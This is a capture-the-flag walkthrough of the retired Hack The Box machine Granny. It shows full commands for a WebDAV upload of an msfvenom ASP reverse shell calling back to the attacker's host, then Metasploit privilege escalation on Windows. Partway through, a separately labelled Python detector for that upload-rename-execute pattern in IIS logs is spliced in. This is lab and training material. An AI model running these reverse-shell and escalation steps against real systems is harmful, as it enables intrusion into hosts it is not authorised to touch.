This is a writeup for the retired Hack The Box Granny machine.
- Hack The Box Machine address
- Machine IP: 10.10.10.15
Solution summary
To solve the machine, run through the following 3 steps:
- Exploit WebDAV vulnerability CVE-2017-7269 in outdated Microsoft IIS version 6.0.
- Upload an .asp payload using the WebDAV vulnerability and launch a user reverse shell.
- Escalate to root shell with Metasploit by exploiting an unpatched Windows installation with the CVE-2014-4076 TCP/IP Input Output Control (IOCTL) vulnerability.
Solution
Nmap
First, run Nmap to see which services are running on this machine.
nmap -oX machines/granny/nmap.xml -sV -A -sC 10.10.10.15
This is what you should see when Nmap finishes running:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-09-07 09:29 JST
Nmap scan report for 10.10.10.15
Host is up (0.089s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_ Server Date: Sat, 07 Sep 2024 00:19:22 GMT
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds
Findings:
- Runs Windows
- Old version of Microsoft IIS (6.0)
- WebDAV available on this server, CVE-2017-7269 exploitable
Root page of http://10.10.10.1
WebDAV
Use davtest to test for arbitrary WebDAV
file uploads using the following command:
davtest.pl -url http://10.10.10.15
davtest should output the following, suggesting that you can indeed upload
your own files.
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: tmBBHB93Jv8eP5
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
********************************************************
Sending test files
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT php SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT asp FAIL
PUT shtml FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT aspx FAIL
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
Checking for test file execution
EXEC jhtml FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
EXEC cfm FAIL
EXEC php FAIL
EXEC pl FAIL
EXEC jsp FAIL
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
********************************************************
/etc/profiles/per-user/justusperlwitz/bin/davtest.pl Summary:
Created: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jhtml
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.cfm
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.php
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.pl
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.jsp
PUT File: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.html
Executes: http://10.10.10.15/DavTestDir_tmBBHB93Jv8eP5/davtest_tmBBHB93Jv8eP5.txt
List the files that you’ve just uploaded using the cadaver utility:
echo "ls" | cadaver http://10.10.10.15
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_tmBBHB93Jv8eP5 0 Sep 7 09:26
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_log 0 Apr 12 2017
Coll: _vti_pvt 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: _vti_txt 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
Creating and uploading a reverse shell payload
It’s time to get out the big (Metasploit) guns, and make yourself a nice ASP reverse shell.
Set up socat to listen on TCP port 4444 on your machine by running
the following command in your shell:
socat -d TCP4-LISTEN:4444 STDIO
Then, create a non-Meterpreter reverse shell using msfvenom by running
the following command in your shell:
# This payload does not rely on meterpreter
msfvenom -p windows/shell_reverse_tcp \
--platform windows \
--arch x86 \
RHOST=10.10.10.15 \
LHOST="10.10.16.2" \
LPORT=4444 -f asp \
> machines/granny/msfvenom_shell.asp
Then, using davtest.pl and cadaver, upload the shell as shell.html and
rename it to shell.asp. You can use the following two commands to achieve
this:
davtest.pl -url http://10.10.10.15 \
-uploadfile machines/granny/msfvenom_shell.asp \
-uploadloc 'shell.html'
echo "move shell.html shell.asp" | cadaver http://10.10.10.15
Now, trigger the RCE by launching the reverse shell that you have just uploaded and renamed.
Use the following curl invocation to launch the reverse shell:
curl -v "http://10.10.10.15/shell.asp"
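The upload-as-.html, MOVE-to-.asp, GET-to-trigger sequence above leaves a distinctive trail in the IIS W3C log. The following detector is an added example (not part of the original writeup) that flags a client which PUTs a file, then MOVEs or COPYs that same path, then requests an .asp/.aspx resource; the log lines are constructed to mirror the writeup's sequence and the W3C field order is the IIS 6 default.

```python
"""Flag the WebDAV PUT -> MOVE -> GET .asp pattern in IIS W3C logs (added example)."""
from collections import defaultdict

# Constructed sample log. Field order is the IIS 6 W3C default:
# date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
# cs(User-Agent) sc-status sc-substatus sc-win32-status
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-09-07 00:19:22 10.10.10.15 OPTIONS / - 80 - 10.10.16.2 Nmap 200 0 0
2024-09-07 00:30:01 10.10.10.15 PUT /shell.html - 80 - 10.10.16.2 davtest 201 0 0
2024-09-07 00:30:05 10.10.10.15 MOVE /shell.html - 80 - 10.10.16.2 cadaver 201 0 0
2024-09-07 00:30:10 10.10.10.15 GET /shell.asp - 80 - 10.10.16.2 curl 200 0 0
2024-09-07 00:31:00 10.10.10.15 GET /iisstart.htm - 80 - 10.10.14.9 Mozilla 200 0 0
"""

EXEC_EXT = (".asp", ".aspx")      # extensions IIS hands to a script engine
OK_STATUS = {200, 201, 204}       # statuses meaning the write succeeded

def parse(log_text):
    """Yield (client_ip, method, uri_stem, status) for each record line."""
    for line in log_text.splitlines():
        if not line or line.startswith("#"):   # skip blank and directive lines
            continue
        f = line.split()
        yield f[8], f[3], f[4], int(f[10])

def detect_upload_rename_exec(log_text):
    """Return {client_ip: [(uploaded_path, executed_path), ...]} for clients that
    uploaded a file, renamed it server-side, and then requested an .asp/.aspx URI.
    The MOVE Destination header is not logged by default, so the rename is matched
    on the source path only, and the later executable request is taken as the hit."""
    state = defaultdict(lambda: {"put": set(), "moved": set(), "hits": []})
    for ip, method, uri, status in parse(log_text):
        s = state[ip]
        if method == "PUT" and status in OK_STATUS:
            s["put"].add(uri)
        elif method in ("MOVE", "COPY") and uri in s["put"] and status in OK_STATUS:
            s["moved"].add(uri)
        elif method == "GET" and uri.lower().endswith(EXEC_EXT) and s["moved"]:
            s["hits"].append((sorted(s["moved"])[0], uri))
    return {ip: s["hits"] for ip, s in state.items() if s["hits"]}

if __name__ == "__main__":
    for ip, hits in detect_upload_rename_exec(SAMPLE_LOG).items():
        for uploaded, executed in hits:
            print(f"{ip}: uploaded {uploaded}, renamed it, then executed {executed}")
```

Running it against a real log only needs the W3C field order checked against the #Fields: directive; a plain PUT of an .asp that was not blocked would not trip this rule and should be watched for separately.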
Host enumeration
The reverse shell should connect to socat successfully at this point. This
section shows some common commands that you can run to get a better overview
over what accounts and services are on this machine.
First, find out who you’re logged in as using whoami like so:
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
nt authority\network service
Your user is just network service, so you can’t yet read out the administrator flag.
Find all user accounts on the machine by running net users:
c:\windows\system32\inetsrv>net users
User accounts for \\GRANNY
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
SUPPORT_388945a0
The command completed successfully.
The user Lakis looks interesting. Before checking which groups Lakis belongs to,
list all local groups on the machine using net localgroup like so:
c:\windows\system32\inetsrv>net localgroup
Aliases for \\GRANNY
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*IIS_WPG
*Network Configuration Operators
*OWS_209498277_admin
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
The command completed successfully.
Inspect the users IWAM_GRANPA and LAKIS using net user like so:
c:\windows\system32\inetsrv>net user IWAM_GRANPA
User name IWAM_GRANPA
Full Name Launch IIS Process Account
Comment Built-in account for Internet Information Services to start out of process applications
User's comment Built-in account for Internet Information Services to start out of process applications
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *IIS_WPG
Global Group memberships *None
[...]
c:\windows\system32\inetsrv>net user LAKIS
User name Lakis
Full Name Papalakis
Comment
User's comment
Country code 000 (System Default)
Account active Yes
[...]
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
To see open ports on the machine, run netstat -ano. You should see the following
output:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 952
TCP 0.0.0.0:1027 0.0.0.0:0 LISTENING 404
TCP 0.0.0.0:5859 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.15:1037 10.10.16.2:4444 ESTABLISHED 3900
TCP 127.0.0.1:1028 0.0.0.0:0 LISTENING 1936
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 404
UDP 0.0.0.0:1026 *:* 732
UDP 0.0.0.0:4500 *:* 404
UDP 10.10.10.15:123 *:* 768
UDP 10.10.10.15:137 *:* 4
UDP 10.10.10.15:138 *:* 4
UDP 127.0.0.1:123 *:* 768
UDP 127.0.0.1:1029 *:* 768
Dump all firewall info using netsh firewall show config:
c:\windows\system32\inetsrv>netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Disable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Port configuration for Standard profile:
Port Protocol Mode Name
-------------------------------------------------------------------
80 TCP Enable IIS
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 8 Allow inbound echo request
Log configuration:
-------------------------------------------------------------------
File location = C:\WINDOWS\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
Access is denied.
Review all network interface information using ipconfig /all, route print and arp -A:
c:\windows\system32\inetsrv>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : granny
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-A9-25
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.10.10.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
c:\windows\system32\inetsrv>route print
route print
IPv4 Route Table
===========================================================================
Interface List
0x1 ........................... MS TCP Loopback interface
0x10003 ...00 50 56 b9 a9 25 ...... Intel(R) PRO/1000 MT Network Connection
===========================================================================
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.15 10
10.10.10.0 255.255.255.0 10.10.10.15 10.10.10.15 10
10.10.10.15 255.255.255.255 127.0.0.1 127.0.0.1 10
10.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 10
127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
224.0.0.0 240.0.0.0 10.10.10.15 10.10.10.15 10
255.255.255.255 255.255.255.255 10.10.10.15 10.10.10.15 1
Default Gateway: 10.10.10.2
===========================================================================
Persistent Routes:
None
c:\windows\system32\inetsrv>arp -A
arp -A
Interface: 10.10.10.15 --- 0x10003
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-cc-3b dynamic
Using Meterpreter
Privilege escalation on Windows machines can be boring sometimes.
You deserve a break: use Meterpreter to finish this machine. Run the following
commands inside msfconsole in your terminal:
# msfconsole
set RHOSTS 10.10.10.15
set LHOST 10.10.16.2
set LPORT 4444
use exploit/windows/iis/iis_webdav_upload_asp
run
# inside meterpreter, run
# > background
# We're in yay
# but getsystem don't do nothing
Metasploit is convenient. I don’t even have to pretend that I know how to hack Windows systems anymore:
use post/multi/recon/local_exploit_suggester
set SESSION 1
exploit
# Kaboom
After Metasploit finishes searching for vulnerabilities, you should see the following exploit candidates:
exploit/windows/local/ms10_015_kitrap0d
The service is running, but could not be validated.
exploit/windows/local/ms14_058_track_popup_menu
The target appears to be vulnerable.
exploit/windows/local/ms14_070_tcpip_ioctl
The target appears to be vulnerable.
exploit/windows/local/ms15_051_client_copy_image
The target appears to be vulnerable.
exploit/windows/local/ms16_016_webdav
The service is running, but could not be validated.
exploit/windows/local/ppr_flatten_rec
The target appears to be vulnerable.
Try a few of these exploits. For this writeup, the TCP IOCTL exploit worked well.
# First, we migrate to another user process, w3wp.exe
# (whatever that means, might as well just say zoom and enhance)
# migrate 3728
use exploit/windows/local/ms14_070_tcpip_ioctl
set SESSION 1
exploit
sessions -i 2
Find the flags by going through the user directories:
meterpreter > dir "C:/Documents and Settings"
Listing: C:/Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2017-04-13 03:48:10 +0900 Administrator
040777/rwxrwxrwx 0 dir 2017-04-12 23:03:34 +0900 All Users
040777/rwxrwxrwx 0 dir 2017-04-12 23:04:48 +0900 Default User
040777/rwxrwxrwx 0 dir 2017-04-13 04:19:46 +0900 Lakis
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:32 +0900 LocalService
040777/rwxrwxrwx 0 dir 2017-04-12 23:08:31 +0900 NetworkService
[...]
meterpreter > dir "C:/Documents and Settings/Lakis/Desktop"
Listing: C:/Documents and Settings/Lakis/Desktop
================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:20:07 +0900 user.txt
meterpreter > cat "C:/Documents and Settings/Lakis/Desktop/user.txt"
[...]
meterpreter > dir "C:/Documents and Settings/Administrator/Desktop"
Listing: C:/Documents and Settings/Administrator/Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100444/r--r--r-- 32 fil 2017-04-13 04:17:07 +0900 root.txt
meterpreter > cat "C:/Documents and Settings/Administrator/Desktop/root.txt"
[...]
The flags are:
- User flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
- Root flag: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX